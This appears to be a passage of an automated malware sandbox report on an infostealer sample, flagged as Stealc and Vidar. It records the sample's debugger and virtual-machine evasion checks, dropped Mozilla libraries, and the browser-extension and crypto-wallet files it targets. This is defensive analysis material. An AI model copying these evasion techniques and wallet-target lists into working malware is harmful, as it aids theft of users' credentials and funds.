Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C419 second address: 50C423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2DFCDF7156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C423 second address: 50C427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E69C second address: 50E6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51508A second address: 5150B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7113h 0x00000007 jmp 00007F2DFC4C710Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514F79 second address: 514F89 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2DFCDF7156h 0x00000008 jne 00007F2DFCDF7156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529D1A second address: 529D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529D21 second address: 529D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F2DFCDF7156h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jns 00007F2DFCDF715Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529D35 second address: 529D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F2DFC4C710Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529D4A second address: 529D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539ACB second address: 539AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539AD1 second address: 539AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2DFCDF7167h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539AF1 second address: 539AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539DEE second address: 539DF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A098 second address: 53A09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A09C second address: 53A0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7160h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F2DFCDF7156h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0BC second address: 53A0DE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2DFC4C711Dh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D1D9 second address: 53D1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D1DD second address: 53D205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2DFC4C7116h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jnl 00007F2DFC4C7106h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D205 second address: 53D256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jbe 00007F2DFCDF7156h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jns 00007F2DFCDF715Bh 0x00000015 mov dword ptr [ebp+122D2D76h], eax 0x0000001b push 00000004h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F2DFCDF7158h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 or dword ptr [ebp+1247E029h], esi 0x0000003d push 25F1CB73h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D256 second address: 53D273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2DFC4C7119h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D4E0 second address: 53D4EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D4EE second address: 53D4F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541FC9 second address: 541FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B902A8 second address: 4B9030F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 0A4Ah 0x00000007 pushfd 0x00000008 jmp 00007F2DFC4C710Bh 0x0000000d jmp 00007F2DFC4C7113h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F2DFC4C7116h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F2DFC4C710Ch 0x00000026 sbb ah, FFFFFF98h 0x00000029 jmp 00007F2DFC4C710Bh 0x0000002e popfd 0x0000002f mov esi, 24F3D94Fh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90374 second address: 4B90378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90378 second address: 4B9037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9037E second address: 4B903B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2DFCDF7160h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2DFCDF715Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BE35 second address: 45BE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A62 second address: 4B90A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A67 second address: 4B90A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A6D second address: 4B90A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A71 second address: 4B90ACE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushfd 0x00000011 jmp 00007F2DFC4C7119h 0x00000016 or cx, E9F6h 0x0000001b jmp 00007F2DFC4C7111h 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bh, al 0x00000028 popad 0x00000029 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 450942 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4E13B0 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 9.9 %

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00054910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00054910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0004DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0004E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0004BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00053EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00053EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0004F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_000538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0004ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00054570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00054570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0004DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00041160 GetSystemInfo,ExitProcess,

0_2_00041160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HDBKFHIJ.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: HDBKFHIJ.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: HDBKFHIJ.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266789162.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: HDBKFHIJ.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: HDBKFHIJ.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: HDBKFHIJ.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: HDBKFHIJ.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: HDBKFHIJ.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: HDBKFHIJ.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: HDBKFHIJ.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: HDBKFHIJ.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: HDBKFHIJ.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: HDBKFHIJ.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: HDBKFHIJ.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: HDBKFHIJ.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: HDBKFHIJ.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: HDBKFHIJ.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HDBKFHIJ.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: HDBKFHIJ.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59413
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58245
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58237
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58226
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58223
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58277

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_000445C0

Source: C:\Users\user\Desktop\file.exe

0_2_00059860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00059750 mov eax, dword ptr fs:[00000030h]

0_2_00059750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00057850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00057850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5424, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00059600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00059600

Source: file.exe, file.exe, 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: !IProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00057B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00056920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00056920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00057850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00057850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00057A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00057A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2038617483.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5424, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5424, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
